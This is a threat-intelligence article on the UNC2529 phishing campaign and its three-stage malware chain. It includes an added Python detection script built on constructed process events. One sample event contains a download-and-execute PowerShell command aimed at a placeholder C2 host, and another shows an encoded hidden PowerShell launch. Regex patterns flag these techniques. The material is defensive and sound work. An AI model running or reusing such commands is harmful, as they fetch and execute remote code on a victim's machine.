
A Triple Combo of DoubleDrop, DoubleDrag, and DoubleBack Malware

A global phishing campaign has been discovered targeting worldwide organizations operating across industries. The phishing campaign used never-before-seen malware strains identified as DoubleDrop, DoubleDrag, and DoubleBack. The campaign used specially-tailored lures.

About the attack

According to a report published by Mandiant, these phishing attacks targeted at least 50 organizations around the world in two waves, during December 2020.
  • The prime target of this phishing campaign was the U.S.; however, the threat group targeted organizations in Asia, Australia, and EMEA as well.
  • Affected sectors were business services, finance, energy, retail, telecom, health, aerospace, manufacturing, national government, transportation, utilities, primary education, and engineering.
  • The UNC2529 threat group is behind this global-scale phishing campaign, which has deployed the three new malware strains (DoubleDrag, DoubleDrop, and DoubleBack) and used around 50 domains to deliver custom phishing lures.

Additional insights

The malware used during these phishing campaigns was heavily obfuscated to hinder analysis by researchers. Moreover, UNC2529 loaded these payloads in memory at several points in the chain to evade detection.
  • During the two waves of attacks, the threat group sent phishing emails with links to a JavaScript-based downloader (identified as DoubleDrag) or an Excel document with an implanted macro.
  • Subsequently, the malicious Excel document with an implanted macro downloaded an in-memory PowerShell-based dropper (identified as DoubleDrop) from attackers' C2 servers.
  • Further, the DoubleDrop dropper carries two instances (32-bit and 64-bit) of a backdoor (identified as DoubleBack), implemented as a PE dynamic library and injected into the PowerShell process.
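The execution chain described above (macro-enabled Excel document or JavaScript downloader, then an in-memory PowerShell dropper) leaves a recognizable parent/child process pattern. The following detection logic is an added example, not code from the original report or from Mandiant; it runs over constructed Sysmon-style process-creation events whose field names (ParentImage, Image, CommandLine, ProcessId) are assumptions, and the command lines and hostnames are constructed placeholders, not indicators from the campaign.

```python
import re

# Constructed Sysmon-style process-creation events (not from the page);
# field names mirror Sysmon Event ID 1 but are assumptions here.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\user\Downloads\Invoice.pdf.js"'},
    {"ProcessId": 4201, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" /dde'},
    {"ProcessId": 4233, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -Command \"IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/dd')\""},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Command-line markers of a download stage and of in-memory (fileless) execution.
DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
IN_MEMORY = re.compile(r"-enc(odedcommand)?\b|frombase64string|\biex\b|invoke-expression|reflection\.assembly", re.I)

def _base(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return the chain stages an event matches, in chain order (empty list if benign)."""
    parent, image = _base(event.get("ParentImage", "")), _base(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office-spawns-powershell")        # macro launching the dropper
    if parent in SCRIPT_HOSTS and image in SHELLS:
        hits.append("script-host-spawns-powershell")   # JS downloader handing off
    if image in SCRIPT_HOSTS and re.search(r"\.js\b", cmd, re.I):
        hits.append("script-host-runs-js")             # JS downloader stage itself
    if image in SHELLS and DOWNLOAD.search(cmd):
        hits.append("powershell-download")
    if image in SHELLS and IN_MEMORY.search(cmd):
        hits.append("powershell-in-memory")
    return hits

def scan(events):
    """Map ProcessId -> findings for every event matching at least one stage."""
    return {e["ProcessId"]: classify(e) for e in events if classify(e)}
```

Process-creation telemetry alone cannot see the final stage, where the DoubleBack DLL is injected into the already-running PowerShell process; that needs module-load or memory-scanning telemetry. Treat a single hit as a triage signal and two or more stages on the same host within minutes as a high-confidence alert.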

Conclusion

Although there is no evidence that points toward the goals of this threat actor, the targeting of multiple industries and geographies is mostly observed in the case of financially motivated groups. Moreover, DoubleBack appears to be an ongoing attack campaign, indicating that this threat actor is not done yet and may be preparing for more severe or targeted attacks.

Publisher: Cyware